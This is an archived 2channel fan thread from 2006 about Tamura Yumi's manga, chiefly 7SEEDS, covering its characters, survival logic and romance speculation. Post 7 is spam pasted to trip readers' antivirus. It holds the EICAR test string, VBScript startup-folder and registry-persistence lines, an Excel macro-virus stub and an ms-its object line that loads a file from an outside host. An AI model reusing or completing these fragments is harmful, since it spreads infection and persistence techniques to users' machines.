2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■田村由美作品21■

1 :花と名無しさん:2006/12/13(水) 01:03:19 ID:k6REf/fx0
「BASARA」「巴がゆく」「シカゴ」「7SEEDS」
他、田村由美作品についてマターリ語りましょう。
現在「フラワーズ」にて7SEEDS連載。
単行本は9巻まで発売中。

【 注 意 !】
・sage進行でお願いします。
 原則として>>970が次スレ立て。

・各チームのデータ、 過去ログ及び関連スレは>>2-10あたり
 最低限、先に目を通してからスレに参加してください。
(できれば現行スレを全部読んでからが望ましいです)

・最新号のネタバレ解禁は発売日午後より。
 最新号のあらすじが知りたければ、早売りスレに行きましょう。
【早売りゲッター】総合スレ・十四冊目【ネタバレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1160614052/

前スレ
■田村由美作品20■
http://comic6.2ch.net/test/read.cgi/gcomic/1161533159/

2 :花と名無しさん:2006/12/13(水) 01:03:54 ID:???0
7SEEDS登場人物まとめ

【春】 (花・ハルは鷹弘と共に別行動中)
末黒野 花(17) 元水泳部の高2 サバイバル技術に長ける 東京出身
雪間 ハル(16) 音楽一家に育つピアノ弾き 東京出身 

甘茶 藤子(17) 医学部志望の高校生 茨城出身
角又 万作(18) 座禅・唐詩を好む寺の四男坊 弓道二段
鯛網  ちさ(18) 大臣出が多い良家のお嬢様 石川出身
野火桃太郎(12) 神童の名高い少年 宮城出身
新草ひばり(?)  解凍失敗のためか目覚めず 詳細不明
柳  踏青(?)  死亡(捕食/自殺) ガイド・自衛隊出身


【夏B】 (ナツ・嵐・蝉丸は船地点、百舌も別行動)
岩清水ナツ(16) 登校拒否の高1 埼玉出身
青田 嵐(17)  水泳部所属の高2 東京出身
麻井 蝉丸(18) 不安定な母子家庭に育つ不良青年 浜松出身

百舌(?)     サバイバル技術に長ける以外一切詳細不詳

守宮ちまき(19) 美大1年 熊本出身
天道まつり(16) プチ家出中のコギャル 実家は農家
草刈 蛍(12)  異常に勘がきく少女
早乙女牡丹(?)  ガイド・元婦人警官

3 :花と名無しさん:2006/12/13(水) 01:04:29 ID:???0
【秋】 (2派に分裂中)
稲架 秋ヲ(?) T大卒(在学?)青年実業家
猪垣 蘭(?)  設計を専門にしてる?
刈田 葉月(?) オリンピック級の柔道家
八巻 朔也(?) 将棋の名人(法学部?)

荻原 流星(?) パラグライダー乗り?くるみの子の父?
鹿野くるみ(?)  牧場の子?気が弱そう 妊娠中?
梨本 茜(?)   海女さんの家系の生まれ
十六夜良夜(?) ガイド・消防士

【冬】
新巻  鷹弘 50年に一人のピッチャーと呼ばれる高校球児 神奈川出身
鮫島  吹雪 死亡(捕食) 今世紀最高のショートと呼ばれる高校球児 広島出身
神楽坂美鶴 死亡(自殺) 日本舞踏界のホープ 高校野球マニア
枯園  睦月 死亡(捕食/自殺) 一度見た風景は忘れないT大1年
柴漬 アラレ 死亡(解凍失敗)
綾取  風花 死亡(解凍失敗)
室咲  冬至 死亡(解凍失敗)
熊川  冴 死亡(捕食) ガイド

4 :花と名無しさん:2006/12/13(水) 01:05:02 ID:???0
【夏A】
種にするための優秀な人材として生まれた時から特殊施設で育てられた。
おそらく試験管ベビーで全員名字もなく、名前のみ。

安居 …火・水クラス
涼  …火・水 クラス
小瑠璃…風・医療クラス
源五郎…動物・植物クラス
鷭  …医療・動物クラス
あゆ …植物クラス、もう一つのクラスは不明
虹子 …土・植物クラス
卯浪 …ガイド 死亡(メンバーによって銃殺)

5 :花と名無しさん:2006/12/13(水) 01:05:34 ID:???0
過去ログ
http://artemis.s77.xrea.com/gclog/tamura/

関連スレ
田村由美 「BASARA(バサラ)」 Part6 (懐かし漫画板)
http://comic6.2ch.net/test/read.cgi/rcomic/1151484412/l50


7SEEDSラジオドラマ発売中。全三巻。
ttp://www.bestack.co.jp/

夏チーム:岩清水ナツ…南里侑香/青田嵐…鳥海浩輔
     麻井蝉丸…小西克幸/早乙女牡丹…高島雅羅
     百舌…井上和彦  ほか
冬チーム:新巻鷹弘…佐々木望/鮫島吹雪…檜山修之
     神楽坂美鶴…久川綾  ほか
春チーム:末黒野花…雪野五月/甘茶藤子…山田美穂
     角又万作…置鮎龍太郎/雪間ハル…保志総一朗

6 :花と名無しさん:2006/12/13(水) 01:06:04 ID:???0
よく話題にのぼるネタ

・7SEEDSの時代はBASARAの世界に繋がっているのでは?
 九州が分断されている、生態系が違いすぎるなど、理由はいろいろありますが
 別物と考えたほうがいいです。
 作者はおそらく、同じものとして描いていないと思われます。

・百舌=死神なの?夏Aの誰か?
 9巻で要先輩が行く気であると判明。名字は百舌戸。
 ただ夏Aの安居が半分白髪になったこともあり、まだ確実ではない。
 涼・茂説もまだあり。(茂は厳しいか?)

7 :<body onload=window()>:2006/12/13(水) 01:18:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

8 :花と名無しさん:2006/12/13(水) 12:48:09 ID:???0
>>1
乙でーす

9 :花と名無しさん:2006/12/13(水) 21:51:31 ID:???0
またウイルスがー
書き込めない

10 :花と名無しさん:2006/12/13(水) 21:53:43 ID:???0
専ブラ入れて、アンチウイルスソフトで除外すれば快適だよ

11 :花と名無しさん:2006/12/13(水) 22:03:23 ID:???0
>>9
ノートン使ってんの?
除外すればおk
このスレだけじゃなくて、これからもウイルスコードを貼られるスレに行く事にもなるだろうから、
早めの除外設定をススメル。

セキュリティ板のノートンスレに行ってそこで調べてもいいし、ぐぐっても対策方法は出てくると思う。

12 :花と名無しさん:2006/12/13(水) 23:19:33 ID:???0
新スレが立つ度に、貼る奴がいる。あ〜ウザい〜〜っ!!

13 :花と名無しさん:2006/12/13(水) 23:23:34 ID:???0
テンプレに除外の方法も入れたほうがいいんじゃねーの?

14 :花と名無しさん:2006/12/14(木) 15:11:16 ID:???0
ファン・信者が痛すぎる少女漫画作品や作家
ttp://comic6.2ch.net/test/read.cgi/gcomic/1148474271/557-

>557 名前: 花と名無しさん [sage] 投稿日: 2006/12/13(水) 09:32:18 ID:???0
>普段は「人間の誇りを描ききった〜」とか痛いマンセーぶりをさらしてるのに
>いざ根本的なところを突っ込まれると「漫画だから」と逃げるバサラ信者

558に降臨した方をお引取り願います。

15 :花と名無しさん:2006/12/14(木) 20:43:16 ID:???0
桃太郎はいつになったら再登場するんだろうか

16 :花と名無しさん:2006/12/14(木) 21:03:15 ID:???O
ナツが(略。期待しすぎて待ちくたびれた。このままじゃいざ再登場しても、相
変わらずセミにどつかれ、しかもそれほど活躍しなくて拍子抜けしそうな悪寒。

17 :花と名無しさん:2006/12/14(木) 21:19:30 ID:???0
何巻か忘れたけど(3巻だったかな?)花が回想シーンで嵐に髪の毛を褒められて触らせた後、
現実に戻って髪もボサボサ、化粧水も尽きたって書いてあったよな?

化粧水も尽きたって化粧水なんてあったのかな。リュックに詰めてあったとうに賞味期限切れであろう
危ない化粧水を我慢して使ってたのか。
それとも目覚めた船形の解凍装置から目覚めたときにそこに置いてあったのか・・・

18 :花と名無しさん:2006/12/14(木) 21:22:09 ID:???0
賞味期限w
花たちはシェルターを見つけたんだよね?
グリセリンの一瓶くらい、あったんじゃないの
それだけあれば水と混ぜるだけで化粧水として使える。

19 :花と名無しさん:2006/12/14(木) 21:26:34 ID:???0
それ以前作った事あるなぁ・・・
精製水とグリセリンとあともう一つ何か混ぜた記憶が。
なるほど

20 :花と名無しさん:2006/12/14(木) 21:29:36 ID:???0
まあ、どのみち使用期限は切れてるだろうが、それでも缶詰が入っていたシェルターだから。

21 :花と名無しさん:2006/12/14(木) 21:37:25 ID:???0
へちまで作れるって聞いたことあるけど。>化粧水

シェルターの中に山のようにある専門書の中に、美容に関する専門書もあるだろうから(あるかな?)、
それを見て、適当に、植物探して作れば…

22 :花と名無しさん:2006/12/14(木) 21:51:18 ID:???0
そんな適当な植物があるかどうか…
原材料になるような植物って限られてるよね。
へちま・アロエ・どくだみ…

23 :花と名無しさん:2006/12/14(木) 21:56:55 ID:???0
植物自体も以前とは違っているようだし自作は難しそう。

24 :花と名無しさん:2006/12/14(木) 22:04:07 ID:???0
きゅうりやはちみつでも作れるよ>化粧水
まぁどっちにしろそんなもの(ry

25 :花と名無しさん:2006/12/14(木) 22:18:12 ID:???0
精液をかけr

26 :花と名無しさん:2006/12/14(木) 22:20:12 ID:???0
>>25でFAだな

27 :花と名無しさん:2006/12/14(木) 23:02:12 ID:???O
日焼けどめ乳液はさすがに作れないよね。

28 :花と名無しさん:2006/12/14(木) 23:46:38 ID:???0
>>19
水+グリセリン+園芸用肥料の窒素ですかね。
それならシェルターにありそう

29 :花と名無しさん:2006/12/15(金) 02:49:01 ID:???O
前スレで眉毛の手入れのことも話題になってたけど…
ワキ毛とかもそのままってことだよね…

30 :花と名無しさん:2006/12/15(金) 09:15:55 ID:???0
前スレ最後の方の天国の話。

一人殺せば殺人者だが何百万人殺せば征服者になれる。全滅させれば神だ

美帆は貴士を神にしたかったのだろうなと。
そもそも天国なんて信じてないだろうし。
天国ってのは、死ぬっていう意味で使っている。

31 :花と名無しさん:2006/12/15(金) 11:29:12 ID:???O
眉毛ボンバーか

32 :花と名無しさん:2006/12/15(金) 12:11:07 ID:???O
どっかの原住民は脱毛してた気がする
蜂蜜だったか蝋だったか忘れたけど

33 :花と名無しさん:2006/12/15(金) 13:01:57 ID:???0
>>30
全滅させたきゃ放っておけばいい。
貴士が神になるとしたら、種を残すという意味で神になりたかったんじゃないの?
美帆が協力できたのもそういう「大義」があったからかと。
要は自ら箱舟を作り乗り込んだということでノアか。神からの啓示(Xデー)を聞き、自ら計画を作成し、
船に乗るメンバーを選んだ。

34 :花と名無しさん:2006/12/15(金) 13:24:58 ID:???0
>>33
全滅ってのは引用のママで、種の操作というか。
自分たちに義があると思って行動しているとオモタ。

35 :花と名無しさん:2006/12/15(金) 16:05:00 ID:???0
>>29
いや、だったらまず男性キャラは全員髭が生えてないとおかしくないか?w


36 :花と名無しさん:2006/12/15(金) 16:40:34 ID:???0
確か、鷹のセリフに「髭くらいそっとくべきだったね。」というのがあったから、髭を剃るものくらいはあるのかも・・・。

37 :花と名無しさん:2006/12/15(金) 18:37:55 ID:???O
てことは鷹は好んでモジャってたのかw

38 :花と名無しさん:2006/12/15(金) 19:26:55 ID:???0
防寒?

39 :花と名無しさん:2006/12/15(金) 19:42:14 ID:???0
夏Aのマドンナを見てるとどうもバトロワの栗山千晶を思い出すな
特にレイープされそうになるシーン

40 :花と名無しさん:2006/12/15(金) 20:55:06 ID:???0
http://media.spikedhumor.com/8944/Jingle_Bells_Reversed.swf

ジングルベルって逆回転させると最後の方が日本語に聞こえない?

41 :花と名無しさん:2006/12/15(金) 20:55:54 ID:???0
>>40
古いwwww
けどもう時期なんだよな

42 :花と名無しさん:2006/12/15(金) 21:31:53 ID:???0
>40
涼しくなりたくてまた見にいっちゃったw

43 :花と名無しさん:2006/12/15(金) 21:49:38 ID:???0
>>40
それの違う曲でも昔同じ目に遭った。
怖いからもう本当にやめてくれよ・・・

44 :花と名無しさん:2006/12/15(金) 22:42:58 ID:???O
豚切り携帯からスマン。最近初めて読んだ。面白い。
虹子って危機回避は巧いが、クラスの能力高いのかな。
コミクス9巻の見開き『虹子&骸骨×6』が、他の人を見捨ててでも生き残るような冷徹さを表してるんだろうか。

45 :花と名無しさん:2006/12/15(金) 23:14:52 ID:???O
虹子は何で未来に行きたいのかわからんね。共に生きたい相手がいるわけでもなく。
花が言ってた、生きるためだけに生きることができる人間なのかな。そういう本人以外の
人にはほとんど無意味な存在なのかも。

46 :花と名無しさん:2006/12/16(土) 12:37:47 ID:???0
>>39
同じ事思ったノシ

47 :花と名無しさん:2006/12/16(土) 14:23:12 ID:???0
>>45
何が何でも必死に生き抜こうとしているようにも見えないし、
淡々と課題をこなしている感じ。
これから未来での出会いとか出来事で変わっていくんだろうか。
とりあえず他のメンバーと違って冷静沈着に対応できる彼女の存在は
他のチームとの接触で結構大きくなっていくと思う。

48 :花と名無しさん:2006/12/16(土) 14:41:53 ID:???0
虹子って、生きてる事自体にも実はそんなに執着ないような。
もしも死ぬような状況になっても「あぁ、あれが悪かったのね」とか
冷静に分析しながら死んでいきそう。

49 :花と名無しさん:2006/12/16(土) 15:32:25 ID:???0
ああいう世界でうまく生き延びるにはどうしたらいいんだろうね。
以前、花が、青紫のじゅるじゅるに感染した時、危険な動物が近寄ってこなかったので、わざと感染させて、(塩で広がるのを防げると言う事なので)コントロールしながら危険な動物が近寄ってこないようにすれば、生き延びやすいのでは・・・、などと思ったりしたが。

50 :花と名無しさん:2006/12/16(土) 15:47:15 ID:???0
でもいたしかゆし

51 :花と名無しさん:2006/12/16(土) 16:01:58 ID:???O
ビニール袋に青紫を入れ、棒に吊してちらつかせながら移動すればいい。

52 :花と名無しさん:2006/12/16(土) 18:50:48 ID:???0
そこまでして生き残って何になるんだろう

53 :花と名無しさん:2006/12/16(土) 19:05:04 ID:???0
あの青紫のじゅるじゅるは武器にならないかな?
弓矢作って矢の先に塗って攻撃する
かすり傷でも負わせたら数日後・・・・

54 :花と名無しさん:2006/12/16(土) 19:10:57 ID:???O
そこまでして仕留めても食い物として危険で食べられないし、
放置しても死体から増殖して感染するかも?

55 :花と名無しさん:2006/12/17(日) 02:00:42 ID:???O
>>39あれはまんまバトロワのシーンだよね。
あゆって卯波に何かされたのかな?
汚い汚いって言ってたし。
そういや卯波は監視カメラで小瑠璃の裸見てるようヤツだったしな。

56 :花と名無しさん:2006/12/17(日) 04:25:20 ID:???O
とりあえずあゆの眉毛ボンバーだけはみたくない

57 :花と名無しさん:2006/12/17(日) 04:33:15 ID:???O
具体的に何したわけでもないだろうが、いやらしい言葉ぐらいはかけたことあるだろうな。
小瑠璃に対してすら女として品定めをしてたんだから、あゆなら当然だろう。
自分が生死を握ってると思えば余計そうなるのかもね。



58 :花と名無しさん:2006/12/17(日) 15:36:01 ID:???0
全く卯波はわかってないな
一番エロカワイイのは茂なのに

59 :花と名無しさん:2006/12/17(日) 16:38:36 ID:???O
そういえば男が男を、女が女を好きになってしまったらどうなるんだろう…
種としての意義なくなっちゃうよね

60 :花と名無しさん:2006/12/17(日) 17:03:37 ID:???O
そうゆう人はそもそも種に選ばれないとオモ
多分家系の病気とか調べる時に一緒に調べるんじゃないか

61 :花と名無しさん:2006/12/17(日) 17:14:43 ID:???0
個人的な趣味嗜好を?ムリムリ。
それに、恋愛経験が豊富なほどに年をとってない奴ばっかり選んでるんだから、
ノーマルだと思っても未来へ行って、初めて異性の生態を目の当たりにして、
幻滅して同姓に走る可能性だってあるわけで。
まあ、ああいう環境に放り出されたら男の方が本能のままに行動すれば、
レイプまがいだろうとも行為そのものは出来るわけで。
そもそも同性愛って、文化的に発達して本能の薄れた人間に起こる現象だし。
ひょっとしたら、そっちに走った連中は死神の手にかかるのかもしれんが。

62 :花と名無しさん:2006/12/17(日) 18:44:05 ID:???O
そうそう、>>61がおいらの言いたいこと上手く説明してくれた>>>60@59
十分後からってありえるよね
まさか茂はそういう要因になりかねないって理由で…

63 :花と名無しさん:2006/12/17(日) 18:49:20 ID:???0
>>59
虹子「気をつけなさいよ、ホモは選ばれないから」

64 :花と名無しさん:2006/12/17(日) 20:35:23 ID:???0
どう考えても茂はホモ系だったよね・・・
女の子なんか見向きもしなかったし

65 :花と名無しさん:2006/12/17(日) 20:48:30 ID:???0
女の子に見向きもしていないのは源五郎やバンも同じだね。

66 :花と名無しさん:2006/12/17(日) 21:16:54 ID:???O
茂みたいな子を守りたくなってしまう>安居、嵐
茂みたいな子にちょっかい出しちゃうタイプ>蝉丸
ここから間違いが発展してもおかしくは…な…い…

67 :花と名無しさん:2006/12/17(日) 21:47:33 ID:???0
嵐の好みは花だからそれは無いだろう。

68 :花と名無しさん:2006/12/17(日) 22:06:56 ID:???0
シカゴのメイン3人のキャラクターが花と嵐と蝉丸に見えて仕方がない
そういやシカゴの一巻に「花」って名前だけ出てくるけど、別人かね?

69 :花と名無しさん:2006/12/17(日) 23:01:01 ID:???O
花と嵐の他には、現在熱愛中の恋人がいた人は選ばれてないんだろうな。
でないと全国中に第二第三の花と嵐達が放浪しまくりになるw

70 :花と名無しさん:2006/12/17(日) 23:05:13 ID:???0
まぁ花は関係者の娘って時点で特別だからな。
嵐は花にだっこで夏Bに選ばれたわけだし。

ところで花の好きになった人が何の特技もない普通の体の持ち主、あるいは病弱だったらどうしたんだろう。
それでも夏Bに入れたのかな。
花の好きになった人が偶然嵐みたいな人だったけど、好きになる人なんてどんなヤツかわからないよね。

71 :花と名無しさん:2006/12/17(日) 23:09:04 ID:???0
夏Bチームのスタート地点があの猫に似た島でよかったね。
あのチームのスタートも虫が大量にいるし、決して恵まれた環境では目覚めなかったけど、
春のスタート地点の島(海)から始まったら、かなり大きな打撃を受けてただろう。

夏Aのスタートと秋のスタートはわからないけど、冬は北海道で辛いにしても
少しだけ恵まれてると思った。結局残った人数は一番少なくなっちゃったけどね。

72 :花と名無しさん:2006/12/17(日) 23:31:40 ID:???0
BASARAで蘇芳攻防戦の真っ最中に朱理がタタラの仲間達と
仲良く餅つきをしている本編の展開無視の楽しいイラストがあったけど、
7種でもそういうのやってくれないかな。
ナツに花、嵐と鷹が夏Aと和気藹々としているのとか。
そういうのでなくても各チーム7人ずつのかっこいいイラスト。
冬チームは鷹が十五年前の姿で
ミイラになっていた三人も生前の姿で。

73 :花と名無しさん:2006/12/17(日) 23:35:29 ID:???O
しかし、うじゃうじゃいる分不意打ちを食らう可能性が低い虫達と、単独
でもいつ襲い掛かってくるかわからないトラのいる場所、どっちがましか
なんてわからないよ。

74 :花と名無しさん:2006/12/18(月) 09:27:31 ID:???O
>>61
趣味趣好じゃないよ
>同性愛者か異性愛者か

性的指向。

75 :花と名無しさん:2006/12/18(月) 10:31:10 ID:???O
一応補足すると、>>69は花と嵐のように別チームで両方選ばれてるという意味ではないので。
もし他もにいたら、虚しい放浪の末野垂れ死にしたりするんだろうな。
シェルターにはできるだけ恋人同士を入れてるから、そこら辺は考えてるね。

76 :花と名無しさん:2006/12/18(月) 23:13:02 ID:???0
前のスレで誰か言ってたけど
安居と嵐って似てるから
(その人は親子かな?と言ってたかな)
花が嵐に再開する前に安居に会って
安居を好きになったりしないかな

しかし花は嵐があの世界にきてるって知ったから
それは無理か…

77 :花と名無しさん:2006/12/19(火) 00:14:37 ID:???O
それには安居と嵐のどこが似てるの?てとこから始めないとな…。
顔の作りなら似てるっちゃ似てるが、美鶴とナツが似てるのと意味はそう変わらないと思うが。
貴士も顔が似てるようなことは言ってない。言動も気性も根本的に違うし。
それに、今までの花の行動を見たら、嵐の生死を知る前だろうと、似てるなんて理由で安居を好き
になるなんてないない。そんなキャラならその前に鷹を好きになるって。

78 :花と名無しさん:2006/12/19(火) 00:56:56 ID:???0
田村先生が描きわけできない点を追求しちゃだめだよ

79 :花と名無しさん:2006/12/19(火) 01:46:04 ID:???O
まったく描きわけできないのではないから似てると受け取る場合があるんだろうけど。
ヒーローヒロインの顔はどれも基本パーツが同じなんだな。髪型や泣き黒子があるという違いは、
もう同じ顔じゃない、という印だと思ってる。
蛍とひばりならあえて同じ髪の色、形にしてるように見える。よく似てるという設定なんじゃない
かと思うが。

80 :花と名無しさん:2006/12/19(火) 19:36:26 ID:???0
>>73 目覚めた時天国にいるか、地獄にいるかなどと言ってみたって、この世の中が食物連鎖によって成り立っている以上、
甘い果物や花が豊富に咲き乱れていようが、変異によって凶暴化した生物がいようが、
襲ってくる生物がいない世界にいけるわけじゃない。
どのみち、野生の世界に放り出されたら、生きていくためには多くの困難が待ち受けているのは、当然。
襲ってくる生物がいないなら、それこそ藤子・F・不二雄の『カンビュセスの籤』の世界でしかない。(自給は絶対不可能の世界)

81 :花と名無しさん:2006/12/19(火) 20:20:38 ID:???O
そりゃそうだ。というか>>73>>71の、冬は少しだけ恵まれてる、と言うのに
対する反論みたいなものだったんだけど。

82 :花と名無しさん:2006/12/20(水) 00:29:22 ID:???0
にしても春のスタート地点は過酷杉
夏Bと言わなくとも他のチームでさえ厳しいんじゃないか?
あの過酷な状況で必死に生き延びて−1人で済んだのは奇跡だな

83 :花と名無しさん:2006/12/20(水) 00:56:24 ID:???O
まあ虫が嫌いな人には一番の地獄だろうな。

84 :花と名無しさん:2006/12/20(水) 04:58:12 ID:???0
俺は駄目だ・・・・・
夏Bの白い虫も駄目だ・・・・・
まだ冬の虎のほうがいい
でも北海道は寒いから駄目だ・・・・
まだ秋のほうがいい
でも秋はセックス禁止だから駄目だ・・・・・
もう何もかも駄目だ・・・・・

85 :花と名無しさん:2006/12/20(水) 14:08:57 ID:???0
そういえば秋チームのいた場所は危険な獣もいないし、
虫も小さかった(危険な蜂はいたけど)。
三年間で死人も出ていなかったし、
チームの能力の高さもあるんだろうけど運も良かったんだろうな。

86 :花と名無しさん:2006/12/20(水) 14:30:44 ID:???0
秋のチームの秋ヲや蘭は、「昔にしがみついて生きるより」なんてセリフがあったけど、
もしかしてXデーがいつ起きたかわからないために、未来に行かされなければ、
もしかしたら、自分たちが生きて人生を終わるくらいの間は大丈夫で、
エリートとしての人生を全うできたかもという気持ちがあるのかな・・・。
今回のことでXデーがだいたい、いつ起きたか、わかったら、ふっきれるかも。

87 :花と名無しさん:2006/12/20(水) 14:37:00 ID:???O
>>85 目覚めたのはあの場所じゃないっしょ。

88 :花と名無しさん:2006/12/20(水) 15:38:09 ID:???0
夕べ涼が夢に出てきたよー
都内のホテルに部屋とって、コーヒー作ってベッドで延々と寝てた

89 :花と名無しさん:2006/12/20(水) 21:01:23 ID:???0
>>87
九巻で花が秋チームは関西にいるはずって言ってたから
眠っていた場所も大体あの場所でしょ。

90 :花と名無しさん:2006/12/20(水) 21:02:30 ID:1TdOK2j10
>>87 一年間彷徨ったって言ってたしね。
そして見つけたシェルターの場所に村を築いたんだよね。
でも、鶏のような生き物もいたし、ラマのようなとかいう生き物もいて乗り物にしていたり、ミルクも飲めたりしていたし、
一番恵まれていたとは言えるかも知れない。
結局は灰に村をやられて、住めなくなったけど・・・。

91 :花と名無しさん:2006/12/20(水) 22:09:30 ID:???0
>>86
秋ヲや蘭の政府への憎悪の理由が何なのかによるよね。
大事な人間と引き裂かれたから、とかなら簡単には済まないだろう。

前に秋ヲが「一ヵ月後、まだまだあきらめないぞと思う。
半年後、もうあきらめた方がいいかなと思う。一年後、死のうかな と思う」
と言ってたけど、これってエリートとしての人生失って
プライド傷ついたから、というより嵐達のように
誰か大切な人がいて探してたんじゃないかと思った。

92 :花と名無しさん:2006/12/20(水) 22:38:12 ID:???O
私は単純に、普遍的な現代人の感覚で恨んでるんじゃないかと思ってる。
このスレでもあんな未来に放り出されるよりは隕石落下の時に死にたいって言う人が多いし。
花と嵐くらい焦がれてる人がいる人間ならとうに今頃自殺してそう。

93 :花と名無しさん:2006/12/21(木) 09:17:04 ID:???0
>>89
その情報はナツ→鷹→花たちと伝わったものじゃなかったっけ。

94 :花と名無しさん:2006/12/21(木) 13:56:42 ID:???0
>>91>>92
秋ヲや蘭がどういう理由で政府を憎み続けているのかは
この章ではっきりすると思う。
最愛の恋人を失ったからか、別の違う理由か、
ただ七種で至上の恋人といえるのは
嵐と花だけというのはちょっとな、とは思うが。

95 :花と名無しさん:2006/12/21(木) 18:26:26 ID:???0
藤子には医者の恋人がいたんだったよね。おえらいさんたちが、故意に選んで恋にかけたのなら、もしかしたら、秋のチームの中にでもいるかな?
まさか、秋ヲってことないよね。医者ではなさそうな感じだし・・・・・・。

96 :花と名無しさん:2006/12/21(木) 18:49:54 ID:???0
http://www.37vote.net/anime/1165540235

97 :花と名無しさん:2006/12/21(木) 19:58:56 ID:???O
>>95
好きな人、だろ。恋人とは言ってなかったよ。

98 :花と名無しさん:2006/12/21(木) 23:38:18 ID:???0
恋愛と意識もしてなかったような感じだなあれは
尊敬する先輩って感じで

99 :花と名無しさん:2006/12/22(金) 00:20:12 ID:???O
>>94
秋ヲと蘭まで実は恋人第一な少女漫画キャラだった!…となるのは正直勘弁だなあ(;^^)
嵐と花の存在の特異さが余計際立っちゃう。そうなると、この二人が格別妬まれるようにならない
とおかしいし。ただでさえ夏Aの存在が頭痛いのにそれは嫌。
ただ花嵐の対比として秋の中にカップルが選ばれてたら面白かったかもな〜、ありえないけど。

100 :花と名無しさん:2006/12/22(金) 00:31:26 ID:???O
妬み…そっか。。。
花と嵐が再会したら今度は妬まれるかもしれないね…
花や嵐に惚れてる輩もいるし、そうでない人達もこの二人ばかり大切な人と一緒なんて…って心の底では考えちゃうかもね、人間だし。
花と嵐早く再会してほしいと思ってたけど複雑な気持ちになってきた〜

101 :花と名無しさん:2006/12/22(金) 00:32:40 ID:???O
それよりちゃんとオチつくの?

102 :花と名無しさん:2006/12/22(金) 01:23:15 ID:???0
>>101
つくよ。

嵐「いやあ、スゴイ夢見ちゃったよ。いきなりスゲエ未来に放り出されるの。なんか彼女もいるっていう設定でさぁ」
男子高の友達「ウッソ、マジ?なにその超設定。漫画みてえ」
嵐「だよなぁ、彼女なんかできねえよなぁハハハハ」

いつもの変わらない一日であった。7種 完
                     

103 :花と名無しさん:2006/12/22(金) 01:26:06 ID:???O
>>102
夢オチかよw
しかも嵐のあほ男子学生っぷりにワロタw

104 :花と名無しさん:2006/12/22(金) 02:08:49 ID:???O
>>101
前作が2巻まで出て作者が描くのを諦めたのもあるから、オチなしの場合もある。
今作はそれがかなり不安

105 :花と名無しさん:2006/12/22(金) 02:40:15 ID:???O
オチは決まってる、人類が滅んでENDにはならないとのことだから、それは
心配してないな。それよりグロ・悲惨に走りすぎてB級以下の作品に落ちない
か、鷹が死なず幸せになれるか、ナツと花の役割バランスが良くなるかが自分
的には問題かな。

106 :花と名無しさん:2006/12/22(金) 12:11:41 ID:???O
設定がちゃんとしてれば誰が死んでもいいや
キャラ優先より物語優先してほしいし
地球にいる7種は人間が暮らせる環境か調べる実験なんじゃない
で、生き残った人間が他のコロニーから観察してるとか

107 :花と名無しさん:2006/12/22(金) 12:35:19 ID:???0
桃太郎だけはなにとぞ生かして下さいまし田村さま

108 :花と名無しさん:2006/12/22(金) 13:59:09 ID:???O
とは言っても鷹や小瑠璃、源五郎などが死んでも花や嵐が再会して幸せになって、
ナツが相変わらず蝉にいじめられてひいひい言ってたら話的にどーなの、と思う。

109 :花と名無しさん:2006/12/22(金) 14:28:19 ID:???O
とは言っても鷹や小瑠璃、源五郎などが幸せになって、花や嵐やナツが死んだら話的にどーなの、と思う。

110 :花と名無しさん:2006/12/22(金) 15:04:29 ID:???0
まあぶっちゃけあの世界に放り込まれただけで、全員不幸と言う事には変わりないな
嵐「あっ、空から光が!」
花「花が咲き始めたわ!」
ナツ「水も綺麗になった!」
鷹「変な動物達もいなくなった!」
秋ヲ「俺達は何をしていたんだろう?これから仲良くしよう」
ということでもないかぎり

111 :花と名無しさん:2006/12/22(金) 17:10:41 ID:???O
>>109は普通ありえないが、>>108はけっこうありえるから恐いんだって。

112 :花と名無しさん:2006/12/22(金) 18:56:29 ID:???0
>>102
BASARAのラストと変わらんじゃねーかw

113 :花と名無しさん:2006/12/22(金) 19:01:18 ID:???0
それぞれの、国ごとに行われていることだから、よその国にもいるよね。その人たちとの接点は今後あるかな。
まあ、今の状況を考えると、それこそ、何代も経た後でないと無理そうだけど・・・。

114 :花と名無しさん:2006/12/22(金) 20:17:11 ID:???0
>>111
ナツがいつまでも蝉にいじめられてひいひい言ってる、とかもありえないだろ。
主役でそれは無い。ナツは成長するよ。

115 :花と名無しさん:2006/12/22(金) 20:31:46 ID:???O
それならいいんだけどね。しかし、ナツがそれくらい成長するなら蝉とくっつく線はないよな…。

116 :花と名無しさん:2006/12/22(金) 20:55:15 ID:???0
ヒロイン格の子とくっつくには蝉丸はちょっと、ね。
お互い、何とも思ってないし。

117 :花と名無しさん:2006/12/22(金) 22:06:52 ID:???O
そもそも7種メンバーだけで子孫繁栄出来ないあたり終わってるようなもんじゃん
血が濃くなりすぎ、それ以前に同意でヤるのが普通だから子孫繁栄無理

118 :花と名無しさん:2006/12/23(土) 02:30:12 ID:???0
数十名いるのに繁殖に熱心なカポーが一組しかいなかった時点で
計画はもう失敗だと思う。選定項目に「エロい」「相手構わず」
を入れるべきでしたね

119 :花と名無しさん:2006/12/23(土) 03:10:06 ID:???0
>>117
どこだか知らんが、ミクロネシアには島の全人口の祖先が「妊娠した若い女性」ただ一人って島があってな……。

120 :花と名無しさん:2006/12/23(土) 05:48:54 ID:???0
